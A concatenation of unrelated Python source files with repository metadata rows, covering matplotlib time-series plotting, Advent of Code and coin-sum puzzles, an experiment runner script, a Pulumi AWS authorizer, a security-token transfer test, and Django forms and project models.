import matplotlib.pyplot as plt_date
import matplotlib.dates as datesMat
import logging
import sys
try:
logging.info(': A desenhar o Grafico')
fig = plt.figure()
ax1 = fig.add_subplot(111)
if options.xpixel is not None and options.ypixel is not None:
fig.set_size_inches(float(options.xpixel)/float(options.dpi),float(options.ypixel)/float(options.dpi),forward=True)
fig.subplots_adjust(bottom=0.07,left=0.07, right=0.99, top=0.99)
ax1.set_title(options.title,fontsize=options.fontsize)
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.xlabel is None:
ax1.set_xlabel('',fontsize=options.fontsize-1)
else:
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.ylabel is None:
ax1.set_ylabel('',fontsize=options.fontsize-1)
else:
ax1.set_ylabel(options.ylabel,fontsize=options.fontsize-1)
ax1.tick_params(labelsize=options.fontsize-1)
ax1.hold(True)
for x in range(0,len(options.files_list)):
linestyle1= options.files_list_type[x].strip('"\'')
try:
plt_date.plot_date(datesMat.date2num(Timeseries[x].ValuesX_datenum),
Timeseries[x].ValuesY,
color =options.files_list_color[x].strip('"\''),
label =options.files_list_name[x],
linestyle = linestyle1,
linewidth =options.linewidth,
xdate =True,
ydate =False,
marker =None)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 001 : Failed to draw TimeSerie Plot "' + options.files_list_name[0] + '"'+ ex)
logging.shutdown()
sys.exit()
fig.tight_layout()
# Valor maximo da serie
if options.Ymax is None:
options.Ymax = max(Timeseries.Serie1.ValuesY)
if options.Ymin is None:
options.Ymax = min(Timeseries.Serie1.ValuesY)
leg = ax1.legend(fontsize=options.fontsize-1)
ax1.set_ylim([options.Ymin, options.Ymax])
fig.autofmt_xdate()
except Exception as ex:
logging.info(': Error 008 : Cant plot the data')
logging.shutdown()
sys.exit()
try:
logging.info(': A salvar a figura')
fig.savefig(options.figureOutName, facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=True, bbox_inches='tight', pad_inches=0.01, dpi=options.dpi)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 001 : Error Saving the Figure')
logging.shutdown()
sys.exit()
def drawplot_solo(serie1x,serie1y,serie2x,serie2y,options):
logging.info('Trying to plot a single timeserie, not configured to')
logging.shutdown()
sys.exit()
def drawpscatter(Timeseries,options):
logging.info('Trying to plot a scatter plot, not configured to')
logging.shutdown()
sys.exit()
def drawmultiplot(serie1x,serie1y,serie2x,serie2y,options):
logging.info('Trying to plot a multi plot, not configured to')
logging.shutdown()
sys.exit()
def drawplot5(Timeseries,options):
try:
logging.info(': A desenhar o Grafico')
fig = plt.figure()
gs = gridspec.GridSpec(1, 2, width_ratios=[5, 1])
ax1 = plt.subplot(gs[0]) # plot das séries
ax2 = plt.subplot(gs[1]) # lista de validaçoes
if options.xpixel is not None and options.ypixel is not None:
fig.set_size_inches(float(options.xpixel)/float(options.dpi),float(options.ypixel)/float(options.dpi),forward=True)
try:
ax1.set_title(options.title,fontsize=options.fontsize)
except:
logging.info(': Modulo TimeSeries Draw : Error 002 : Erro no titulo/resumo erros')
logging.shutdown()
sys.exit()
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.xlabel is None:
ax1.set_xlabel('',fontsize=options.fontsize-1)
else:
ax1.set_xlabel(options.xlabel,fontsize=options.fontsize-1)
if options.ylabel is None:
ax1.set_ylabel('',fontsize=options.fontsize-1)
else:
ax1.set_ylabel(options.ylabel,fontsize=options.fontsize-1)
ax1.tick_params(labelsize=options.fontsize-1)
ax1.hold(True)
# reduz o tamanho da série em função da primeira série
max_plot_number = 1000
plot_every_x_points = []
try:
if len(Timeseries.Serie1.ValuesX_datenum) <= max_plot_number:
plot_every_x_points = 1
else:
for x in range(1,1000):
if round(len(Timeseries.Serie1.ValuesX_datenum) / max_plot_number) <= max_plot_number:
plot_every_x_points = x
break
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 003 : Erro do limite de pontos a ser desenhado'+ str(ex))
logging.shutdown()
sys.exit()
# Desenha Plot 1
try:
plot1=ax1.plot_date(datesMat.date2num(Timeseries.Serie1.ValuesX_datenum[::plot_every_x_points]),
[x for x in Timeseries.Serie1.ValuesY[::plot_every_x_points]],
marker='*',
color='r',
markersize=2,
label=options.files_list_name[0],
xdate=True,
ydate=False,
markeredgecolor ='r')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 004 : Erro a desenhar o Plot 1'+ str(ex))
logging.shutdown()
sys.exit()
# Desenha Plot 2
try:
plot2=ax1.plot_date(datesMat.date2num(Timeseries.Serie2.ValuesX_datenum[::plot_every_x_points]),
[x for x in Timeseries.Serie2.ValuesY[::plot_every_x_points]],
'-',
color='k',
linewidth=options.linewidth,
label=options.files_list_name[1],
xdate=True,
ydate=False)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 005 : Erro a desenhar o Plot 2 ' + str(ex))
logging.shutdown()
sys.exit()
# Valor maximo da serie
try:
limits=[min(Timeseries.Serie1.ValuesY),min(Timeseries.Serie2.ValuesY),max(Timeseries.Serie1.ValuesY),max(Timeseries.Serie2.ValuesY)]
if options.Ymax is None:
options.Ymax = max(limits)+0.15*(max(limits)-min(limits))
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 006 : Não consegui implemtnar os limites YMAX pedido ' + str(ex))
logging.shutd
# Valor minimo da serie
try:
limits=[min(Timeseries.Serie1.ValuesY),min(Timeseries.Serie2.ValuesY),max(Timeseries.Serie1.ValuesY),max(Timeseries.Serie2.ValuesY)]
if options.Ymin is None:
options.Ymin = round(min(limits)-0.15*(max(limits)-min(limits)),1)
if round(options.Ymin,1) == 0:
options.Ymin = 0
elif min(limits) >0 or options.Ymin < 0:
options.Ymin = 0
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 007 : Não consegui implementar os limites YMIN pedido ' + str(ex))
logging.shutdown()
sys.exit()
ax1.set_ylim([options.Ymin, options.Ymax])
# Desenhar Legenda
try:
mpl.rcParams['legend.numpoints'] = 1
leg= ax1.legend(fontsize=options.fontsize-1, loc='upper center',ncol=3, fancybox=True, shadow=True)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 008 : Problemas a desenhar a Legenda do grafico ' + str(ex))
logging.shutdown()
sys.exit()
# Formatar a caixa de erros.
try:
xxx=list()
numero_casas_decimais=3
if options.stdev_obs == 1:
xxx.append('Stdev Obs = '+ str(format(round(Timeseries.Serie1.rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.average_obs == 1:
xxx.append('Average Obs = '+ str(format(round(Timeseries.Serie1.average_obs,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.bias == 1:
xxx.append('BIAS = '+ str(format(round(Timeseries.Serie1.bias,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.rmse == 1:
xxx.append('RMSE = '+ str(format(round(Timeseries.Serie1.rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.normalise_rmse == 1:
xxx.append('Normalise RMSE = '+ str(format(round(Timeseries.Serie1.normalise_rmse,numero_casas_decimais))) + '%\n')
if options.unbias_rmse == 1:
xxx.append('Unbias RMSE = '+ str(format(round(Timeseries.Serie1.unbias_rmse,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.normalise_unbias_rmse == 1:
xxx.append('Normalise Unbias RMSE = '+ str(format(round(Timeseries.Serie1.normalise_unbias_rmse,numero_casas_decimais))) + '%\n')
if options.rcorr == 1:
xxx.append('R = '+ str(format(round(Timeseries.Serie1.rcorr,numero_casas_decimais))) + '\n')
if options.nash_sutcliffe == 1:
xxx.append('Nash-Sutcliff = '+ str(format(round(Timeseries.Serie1.nash_sutcliffe,numero_casas_decimais))) + '\n')
if options.skill == 1:
xxx.append('SKILL = '+ str(format(round(Timeseries.Serie1.skill,numero_casas_decimais))) + '\n')
if options.rcorr_quad == 1:
xxx.append('Rcorr Quad = '+ str(format(round(Timeseries.Serie1.rcorr_quad,numero_casas_decimais))) + '\n')
if options.z_fisher == 1:
xxx.append('Z-Fisher = '+ str(format(round(Timeseries.Serie1.z_fisher,numero_casas_decimais))) + '\n')
if options.alfa == 1:
xxx.append('Alfa = '+ str(format(round(Timeseries.Serie1.alfa,numero_casas_decimais))) + '\n')
if options.beta_1 == 1:
xxx.append('Beta 1 = '+ str(format(round(Timeseries.Serie1.beta_1,numero_casas_decimais))) + '\n')
if options.am == 1:
xxx.append('Am = '+ str(format(round(Timeseries.Serie1.am,numero_casas_decimais))) + ' ' + options.parameter + '\n')
if options.bm == 1:
xxx.append('Bm = '+ str(format(round(Timeseries.Serie1.bm,numero_casas_decimais))) + ' ' + options.parameter + '\n')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 009 : Erro criar string de validação com ' + str(ex) + '\n')
logging.shutdown()
sys.exit()
# Desenha a caixa dos erros
try:
ax2.axis('off')
anchored_text = AnchoredText(('\n'.join(xxx)),loc=7,prop=dict(size=options.fontsize),frameon=False)
ax2.add_artist(anchored_text)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 010 : Erro a desenhar string de erros ' + str(ex))
logging.shutdown()
sys.exit()
fig.autofmt_xdate()
#try:
#fig.tight_layout()
#except Exception as ex:
#logging.info(': Error 008 : Falha a fazer o tight layout')
#logging.shutdown()
#sys.exit()
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 011 : Cant plot the data')
logging.shutdown()
sys.exit()
try:
logging.info(': A salvar a figura')
fig.savefig(options.figureOutName, facecolor='w', edgecolor='w',
orientation='portrait',bbox_inches='tight', papertype=None, format=None,
transparent=True, pad_inches=0.1, dpi=options.dpi)
logging.info(': SUCESSO : figura salva')
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 012 : Error Saving the Figure')
logging.shutdown()
sys.exit()
def drawplot2Maps(Timeseries,options):
try:
logging.info(': Ploting TimeSerie Graph')
ax = plt.subplot(str(options.validation_grid[0])+str(options.validation_grid[1])+str(int(options.maps_validation_parameters[options.subplot_index][1])))
#ax.set_aspect(1.0)
a=['','','','','','','','']
#ax.set_yticks([])
for x in range(len(options.timeseries_validation_parameters)):
try:
aux=0
rot=90
auxlabelpad=0
if x is not 0:
if int(options.timeseries_validation_parameters[x-1][6]) is not int((options.timeseries_validation_parameters[x][6])):
ax=ax.twinx()
rot=270
auxlabelpad=8
else:
aux =1
linestyle1 = None;
if aux == 1:
linestyle1= '--'
del aux
else:
linestyle1= '-'
a[x]=ax.plot_date(datesMat.date2num(Timeseries[x].ValuesX_datenum),
Timeseries[x].ValuesY,
color =options.timeseries_validation_parameters[x][3].strip(' ')[1],
label =options.timeseries_validation_parameters[x][7],
linestyle = linestyle1,
xdate =True,
ydate =False,
marker =None)
try:
if options.dynamic_limits == 1:
MTSF.TS._Dynamic_plot_limit(Timeseries,ax, options, x)
else:
ax.set(ylim=[float(options.timeseries_validation_parameters[x][4]),float(options.timeseries_validation_parameters[x][5])])
except Exception as ex:
logging.info(': Modulo TimeSeries Functions : Error 012a : Dynamic plot timeseries limits' + ex)
logging.shutdown()
sys.exit()
plt.ylabel(options.timeseries_validation_parameters[x][8].strip(),
rotation=rot,
labelpad=auxlabelpad,
color=options.timeseries_validation_parameters[x][3].strip(' ')[1])
plt.setp( ax.xaxis.get_majorticklabels(), rotation=20, horizontalalignment='right' )
ax.xaxis.set_major_locator(datesMat.AutoDateLocator())
ax.xaxis.set_major_formatter(datesMat.DateFormatter('%Y %m %d'))
for tl in ax.get_yticklabels():
tl.set_color(options.timeseries_validation_parameters[x][3].strip(' ')[1])
#ax.set_ylim([0,100])
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 013 : Erro a desenhar o Plot '+ options.timeseries_validation_parameters[x][7] + str(ex))
logging.shutdown()
sys.exit()
# Desenhar Legenda
try:
#mpl.rcParams['legend.numpoints'] = 2
plt.subplots_adjust()
b=[]
for x in range(len(options.timeseries_validation_parameters)):
b=b+a[x]
labs = [l.get_label() for l in b]
for x in range(len(labs)):
labs[x]=labs[x].strip()
leg= ax.legend(b,
labs,
fontsize=options.fontsize,
loc='upper center',
ncol=3,
fancybox=False,
shadow=False,
handlelength=4)
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 014 : Problemas a desenhar a Legenda do grafico ' + str(ex))
logging.shutdown()
sys.exit()
#fig = plt.gcf()
#fig.autofmt_xdate()
except Exception as ex:
logging.info(': Modulo TimeSeries Draw : Error 015 : Cant plot the ')
logging.shutdown()
sys.exit()
| UTF-8 | Python | false | false | 20,104 | py | 73 | ModuloTimeSeriesDraw.py | 41 | 0.497611 | 0.483378 | 0 | 432 | 45.506944 | 164 |
mmweber2/reps | 18,906,446,050,038 | 7227bfc4431107a9ca11b8ef0536ecd594872ec0 | 570089a94cc1ee992eb4325998c84c697850ce15 | /codefights/possibleSums.py | 5dbcd5dfd12de382eaf0d260b0d86b4d378d6351 | []
| no_license | https://github.com/mmweber2/reps | a707e2ad192267a6b4137437cccc817eb27f2903 | 8ce26b21f0898ebfc0784261393efad7b1b99d76 | refs/heads/master | 2020-05-21T16:45:27.338269 | 2017-12-10T02:23:55 | 2017-12-10T02:23:55 | 62,955,968 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def possibleSums(coins, quantity):
sums = set()
sums.add(0)
for coin, quant in zip(coins, quantity):
new_sums = set() # Don't confuse new and old values
for coin_total in xrange(0, (coin * quant) + 1, coin):
for s in sums:
new_sums.add(s + coin_total)
sums = new_sums
return len(sums) - 1 # Account for 0 | UTF-8 | Python | false | false | 372 | py | 61 | possibleSums.py | 60 | 0.564516 | 0.551075 | 0 | 10 | 36.3 | 62 |
WalkingMachine/sara_commun | 1,254,130,466,044 | 4449d19e1e54cac9e7e06b143879c2adbf6356c2 | 12bd6522cee8dba32e1ef0dd1d012226ed572874 | /wm_ork/transparent_objects/src/apps/runExperiments.py | a4781b0adaa4b3cfed31a7253257470de6bde0d8 | []
| no_license | https://github.com/WalkingMachine/sara_commun | 55a42ffc0f37821b2d678bedf2df87309227da61 | 79585904ded31eca418614f0306a7308b24ccd0e | refs/heads/master | 2019-07-14T17:47:48.126153 | 2016-10-28T15:37:28 | 2016-10-28T15:37:27 | 58,494,906 | 9 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import subprocess
import os
import sys
import psutil
import time
import re
runner='/home/ilysenkov/ecto_fuerte/build/bin/transparentExperiments'
#runner='/home/ilysenkov/itseezMachine/home/ilysenkov/ecto/server_build/bin/transparentExperiments'
runnerName = 'transparentExperiments'
trainedModelsPath='/media/2Tb/transparentBases/trainedModels/'
experimentsCoresCount = 7
#dataset='/media/2Tb/transparentBases/different_clutter/base_3/'
#datasetName = 'different_clutter_3'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass']
#dataset='/media/2Tb/transparentBases/different_clutter/base_ocl/'
#datasetName = 'different_clutter_ocl'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass']
#dataset='/media/2Tb/transparentBases/good_clutter/base/'
#datasetName = 'good_clutter'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass', 'sourCream']
#dataset='/media/2Tb/transparentBases/fixedOnTable/base/'
#datasetName = 'fixed_on_table'
#allObjects = ['bank', 'bucket', 'bottle', 'glass', 'wineglass', 'sourCream']
dataset='/media/2Tb/transparentBases/finalClutter/base/'
datasetName = 'finalClutter'
allObjects = ['bank', 'bucket', 'bottle', 'glass']
baseLogsPath = '/home/ilysenkov/results/occlusions/'
bigSleepTime = 10
smallSleepTime = 1
def getRunProcessesCount():
processes = psutil.get_process_list()
runProcessesCount = 0
for proc in processes:
match = re.match(runnerName, proc.name)
if (match != None):
runProcessesCount += 1
return runProcessesCount
if __name__ == '__main__':
assert len(sys.argv) == 2, sys.argv[0] + ' <experimentsName>'
baseLogsPath += sys.argv[1]
logsPath = baseLogsPath + '/' + datasetName
if not os.path.exists(baseLogsPath):
os.makedirs(baseLogsPath)
if not os.path.exists(logsPath):
os.makedirs(logsPath)
for obj in allObjects:
runProcessesCount = getRunProcessesCount()
while (runProcessesCount >= experimentsCoresCount):
time.sleep(bigSleepTime)
runProcessesCount = getRunProcessesCount()
logFilename = logsPath + '/' + obj
logFile = open(logFilename, 'w')
command = [runner, trainedModelsPath, dataset, obj]
process = subprocess.Popen(command, stdout=logFile, stderr=logFile)
print obj
time.sleep(smallSleepTime)
#process = subprocess.Popen(command, stdout=subprocess.PIPE)
#print process.stdout.read()
| UTF-8 | Python | false | false | 2,477 | py | 390 | runExperiments.py | 225 | 0.698426 | 0.691562 | 0 | 77 | 31.168831 | 99 |
ehubbard/templates-aws | 2,611,340,148,233 | 220c3edfdd52b6dc1f4c108337af451691da7580 | 2a67dc681af4c4b9ef7a8e18c2ff75377dc5b44f | /aws.apigatewayv2.Authorizer.basic-http-api-python/__main__.py | a429a9be0ee4ec94913ed63b5db33be1e7c13990 | []
| no_license | https://github.com/ehubbard/templates-aws | e323b693a18234defe6bd56ffcc64095dc58e3a1 | 2ae2e7a5d05490078017fed6d132dcdde1f21c63 | refs/heads/master | 2022-11-17T13:53:14.531872 | 2020-07-10T21:56:27 | 2020-07-10T21:56:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pulumi
import pulumi_aws as aws
example = aws.apigatewayv2.Authorizer("example",
api_id=aws_apigatewayv2_api["example"]["id"],
authorizer_type="JWT",
identity_sources=["$request.header.Authorization"],
jwt_configuration={
"audience": ["example"],
"issuer": f"https://{aws_cognito_user_pool['example']['endpoint']}",
})
| UTF-8 | Python | false | false | 364 | py | 2,779 | __main__.py | 2,048 | 0.651099 | 0.645604 | 0 | 11 | 32 | 76 |
Jlevjean/SFT-Protocol | 15,719,580,307,957 | 4bf4e20078b0028f3f2acd9e8d807a6f560dc216 | 0e7514552dfc05b63738228e99d0b5333b8e9d41 | /tests/security_token/transfer/investor_counts.py | 9d7efec93cc3cb98d46296e4ed0e39576c8c5a4d | [
"Apache-2.0"
]
| permissive | https://github.com/Jlevjean/SFT-Protocol | cd6161c2087f5ed1000a533df18c2209d043c280 | bbfaf94df448bf9e653ae2f7d8a1edbf9d693a46 | refs/heads/master | 2020-05-17T23:20:52.137990 | 2019-04-28T21:38:21 | 2019-04-28T21:38:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
from brownie import *
from scripts.deployment import main
def setup():
config['test']['always_transact'] = False
main(SecurityToken)
global token, issuer
token = SecurityToken[0]
issuer = IssuingEntity[0]
token.mint(issuer, 1000000, {'from': a[0]})
def issuer_to_investor():
'''investor counts - issuer/investor transfers'''
_check_countries()
token.transfer(a[1], 1000, {'from': a[0]})
_check_countries(one=(1, 1, 0))
token.transfer(a[1], 1000, {'from': a[0]})
token.transfer(a[2], 1000, {'from': a[0]})
token.transfer(a[3], 1000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[1], 996000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[0], 1000, {'from': a[1]})
_check_countries(one=(2, 1, 1), two=(1, 1, 0))
token.transfer(a[0], 997000, {'from': a[1]})
_check_countries(one=(1, 0, 1), two=(1, 1, 0))
token.transfer(a[0], 1000, {'from': a[2]})
token.transfer(a[0], 1000, {'from': a[3]})
_check_countries()
def investor_to_investor():
'''investor counts - investor/investor transfers'''
token.transfer(a[1], 1000, {'from': a[0]})
token.transfer(a[2], 1000, {'from': a[0]})
token.transfer(a[3], 1000, {'from': a[0]})
token.transfer(a[4], 1000, {'from': a[0]})
token.transfer(a[5], 1000, {'from': a[0]})
token.transfer(a[6], 1000, {'from': a[0]})
_check_countries(one=(2, 1, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[2], 500, {'from': a[1]})
_check_countries(one=(2, 1, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[2], 500, {'from': a[1]})
_check_countries(one=(1, 0, 1), two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[3], 2000, {'from': a[2]})
_check_countries(two=(2, 1, 1), three=(2, 1, 1))
token.transfer(a[3], 1000, {'from': a[4]})
_check_countries(two=(1, 1, 0), three=(2, 1, 1))
token.transfer(a[4], 500, {'from': a[3]})
_check_countries(two=(2, 1, 1), three=(2, 1, 1))
def _check_countries(one=(0,0,0),two=(0,0,0),three=(0,0,0)):
check.equal(
issuer.getInvestorCounts()[0][:3],
(
one[0]+two[0]+three[0],
one[1]+two[1]+three[1],
one[2]+two[2]+three[2]
)
)
check.equal(issuer.getCountry(1)[1][:3], one)
check.equal(issuer.getCountry(2)[1][:3], two)
check.equal(issuer.getCountry(3)[1][:3], three) | UTF-8 | Python | false | false | 2,460 | py | 50 | investor_counts.py | 48 | 0.555285 | 0.460569 | 0 | 68 | 35.191176 | 67 |
moki/aoc2015 | 14,018,773,299,498 | 90a431a2c8633638cab7ae5c535d73d6f0c35ae0 | 1f28dd28e049cd0a9af1259b3213ba13fed8cb69 | /day/day_03/solution.py | 0621340bef611cfc69ab0795e022249ccfc59d31 | [
"BSD-3-Clause"
]
| permissive | https://github.com/moki/aoc2015 | 615b40e21a701d78afc2b38aa91e2cd6e95a5cdc | da43fccd20d154840161c022d1f3c0f70035d604 | refs/heads/main | 2023-03-09T13:08:50.663737 | 2021-02-27T13:47:59 | 2021-02-27T13:47:59 | 342,246,538 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def _hash(x, y):
return hash(str(x) + "," + str(y))
def part_1(input):
x, y = 0, 0
move_map = {"^": (0, 1), ">": (1, 0), "<": (-1, 0), "v": (0, -1)}
house_map = dict()
house_map[_hash(x, y)] = 1
for c in input:
_x, _y = move_map.get(c, (0, 0))
x += _x
y += _y
house_map[_hash(x, y)] = 1
return len(house_map)
def part_2(input):
hx, hy = 0, 0
rx, ry = 0, 0
move_map = {"^": (0, 1), ">": (1, 0), "<": (-1, 0), "v": (0, -1)}
house_map = dict()
house_map[_hash(0, 0)] = 1
i = 0
for c in input:
_x, _y = move_map.get(c, (0, 0))
if i % 2 == 0:
_x += hx
_y += hy
hx = _x
hy = _y
else:
_x += rx
_y += ry
rx = _x
ry = _y
house_map[_hash(_x, _y)] = 1
i = i + 1
return len(house_map)
| UTF-8 | Python | false | false | 923 | py | 9 | solution.py | 8 | 0.339112 | 0.297941 | 0 | 57 | 15.192982 | 69 |
JensGutow/AdventOfCode2020 | 12,309,376,297,589 | 1cd05dce127d982649967690329ccdca8a411136 | b54ed58e5a6e9d8f468c1f36544d6782b276f3be | /tag_09.py | f96ddb9a8c1d8159f4a9791378d5326cbf8e2324 | []
| no_license | https://github.com/JensGutow/AdventOfCode2020 | c69ff3d1be5ff6cf399c4a3ecb14fa1c70323d74 | 9e116175f0042dacdde182424f1286801e7da131 | refs/heads/main | 2023-02-08T10:00:43.584837 | 2020-12-31T06:57:18 | 2020-12-31T06:57:18 | 322,389,060 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import itertools
import time
def get_puzzle(file_name):
pre_Length = 5
p = []
with open(file_name) as f:
p = [int(i) for i in f.read().split()]
return p
def check(text, p_len, i):
check = [sum(x) for x in itertools.combinations(set(text[i-p_len: i]),2)]
return text[i] in check
text = get_puzzle("tag_09.txt")
start = time.perf_counter()
p_len = 25
last = current = 0
for i in range(p_len, len(text)):
if not check(text, p_len, i): break
print(i, text[i], time.perf_counter() - start)
start = time.perf_counter()
th = text[i]
i0 = i1 = 0
s = 2 * text[i0]
check = False
result = None
for i0 in range(len(text)):
if result: break
for i1 in range(i0+1, len(text)):
s = sum(text[i0:i1])
if s > th:
break
if s == th:
seq = text[i0:i1]
min_ = min(seq)
max_ = max(seq)
result = min_ + max_
print (result)
break
print (result, time.perf_counter() - start)
| UTF-8 | Python | false | false | 1,027 | py | 28 | tag_09.py | 25 | 0.538462 | 0.518987 | 0 | 48 | 20.375 | 77 |
benzyp/lakewoodSimcha | 19,292,993,121,140 | f120e0e49e80a0831eed4c49b6af757f69ca47bc | fd2774da9a9a9d311169685eee8331aa034f4ecd | /LakewoodSimcha/app/forms.py | 1a163e065c352a27176f14e71288f1908c5883b8 | []
| no_license | https://github.com/benzyp/lakewoodSimcha | 0d54bd343943d583347879bad971aade3eb3ef9a | 02b9995eef46677f749e8ac4e29a576acf56fb3f | refs/heads/master | 2020-03-13T23:31:15.342130 | 2018-06-19T02:55:36 | 2018-06-19T02:55:36 | 131,336,852 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Definition of forms.
"""
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.utils.translation import ugettext_lazy as _
from django.forms import Form
from app.models import Event,Venue,Customer
from datetimewidget.widgets import DateTimeWidget
class BootstrapAuthenticationForm(AuthenticationForm):
"""Authentication form which uses boostrap CSS."""
username = forms.CharField(max_length=254,
widget=forms.TextInput({
'class': 'form-control',
'placeholder': 'User name'}))
password = forms.CharField(label=_("Password"),
widget=forms.PasswordInput({
'class': 'form-control',
'placeholder':'Password'}))
class EventForm(forms.ModelForm):
class Meta:
model = Event
fields = ('start','event_type', 'title', 'venue', 'description')
dateTimeOptions = { 'showMeridian':True }
widgets = {#Use localization and bootstrap 3
'start': DateTimeWidget(attrs={'id':"start"}, usel10n = True, bootstrap_version=3, options=dateTimeOptions)
}
def __init__(self, venue, *args, **kwargs):
super(EventForm, self).__init__(*args, **kwargs)
#set the venue field to only include venues for the booking at hand
self.fields['venue'].queryset = Venue.objects.filter(venue_type=venue)
class CustomerForm(forms.ModelForm):
class Meta:
model = Customer
exclude = ()
class AdminEventForm(forms.ModelForm):
class Meta:
model = Event
fields = ('start','confirmed','venue')
dateTimeOptions = { 'showMeridian':True }
widgets = {'venue': forms.HiddenInput(),'start':DateTimeWidget(attrs={'id':"start"},usel10n = True, bootstrap_version=3, options=dateTimeOptions)}
labels = {'venue':_('')}
class EditDateForm(forms.Form):
phone = forms.CharField(max_length=10)
dateTimeOptions = { 'showMeridian':True }
edit_event_start = forms.DateTimeField(label = 'New Date', widget=DateTimeWidget(attrs={'id':"start"},usel10n = True, bootstrap_version=3, options=dateTimeOptions))
class UploadFileForm(forms.Form):
venue = forms.IntegerField(widget = forms.HiddenInput(), label = '')
file = forms.FileField() | UTF-8 | Python | false | false | 2,409 | py | 29 | forms.py | 16 | 0.626816 | 0.620589 | 0 | 57 | 41.280702 | 168 |
AmolPachpute/RightArm | 2,130,303,821,066 | ba1d0cd3ce5e70824d711bf85e884f9b8cbbb3ad | 624e0e8d61887303c257c93ac77d799ed8518af5 | /Projects/models.py | 4ea6f2d77147cf5aaffd7d4effb51e54f1c37ecc | []
| no_license | https://github.com/AmolPachpute/RightArm | 9b5f94802f669c6cc3051d8b698b0e1f400694ba | 6d8cabdd9d6c2d46987935d770367a722a3274ed | refs/heads/master | 2021-01-23T03:33:33.179099 | 2014-08-26T09:52:08 | 2014-08-26T09:52:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from thumbs import ImageWithThumbsField
from ckeditor.fields import RichTextField
from Member.models import Member, Skills
from django.contrib.auth.models import User
from basemodule.models import *
import datetime
# Create your models here.
STATUS_CHOICES = ((0, u'Inception/New'), (1, u'In Progress'), (2, u'Completed'
))
POST_TYPE_CHOICES = (
(0, u'Text'),
(1, u'Image'),
(2, u'Video'),
(3, u'Link'),
(4, u'Audio'),
(5, u'Doc/Pdf'),
)
PROJECT_RELATION_TYPE_CHOICES = ((0, u'Owner'), (1, u'Moderator'), (2,
u'Giver'), (3, u'Member'))
TASK_PRIORITY_CHOICES = ((0, u'High'), (1, u'Medium'), (2, u'Low'))
TASK_STATUS_CHOICES = (
(0, u'Complete'),
(1, u'Incomplete'),
(2, u'Inprogress'),
(3, u'Not Yet Started'),
(4, u'Onhold'),
(5, u'Pending'),
)
OFFERED_TYPES = ((0, u'Physical'), (1, u'Virtual'))
class Beneficiary(Base):
""" Class describes beneficiaries for particular project """
name = models.CharField(max_length=100, blank=True, null=True)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Goals(Base):
""" Class describes goals of the project """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Transact(Base):
""" Class describes project requirement types """
name = models.CharField(max_length=100)
description = RichTextField(blank=True, null = True)
def __unicode__(self):
return '%s' % self.name
class Project(Base):
""" This class Stores information about Project """
project_category = models.ForeignKey(Project_Category)
name = models.CharField(max_length=100)
image = ImageWithThumbsField(upload_to='static/%Y/%m/%d', sizes=((90,
120), (120, 120), (180, 240), (360, 480)),
blank=True, null=True)
summary = models.CharField('Project Objective', blank=True, null=True,
max_length=150)
description = RichTextField(blank=True, null = True)
requirement = RichTextField(blank=True, null = True)
target_amount = models.PositiveIntegerField('Target Amt', blank=True,
null=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=0)
created_by = models.ForeignKey(Member, related_name='Project_CreatedBy')
beneficiaries = models.ManyToManyField(Beneficiary, blank=True, null=True)
transactions = models.ManyToManyField(Transact, blank=True, null=True)
goals = models.ManyToManyField(Goals, blank=True, null=True)
start_date = models.DateField(max_length=20, blank=True, null=True)
end_date = models.DateField(max_length=20, blank=True, null=True)
peoples = models.ManyToManyField(Member, through = 'Project_Member_Relationship', blank = True, null = True)
def __unicode__(self):
return '%s' % self.name
class Project_Member_Relationship(models.Model):
""" Class describes project member relationship """
relation_type = \
models.IntegerField(choices=PROJECT_RELATION_TYPE_CHOICES, default=0)
project = models.ForeignKey(Project)
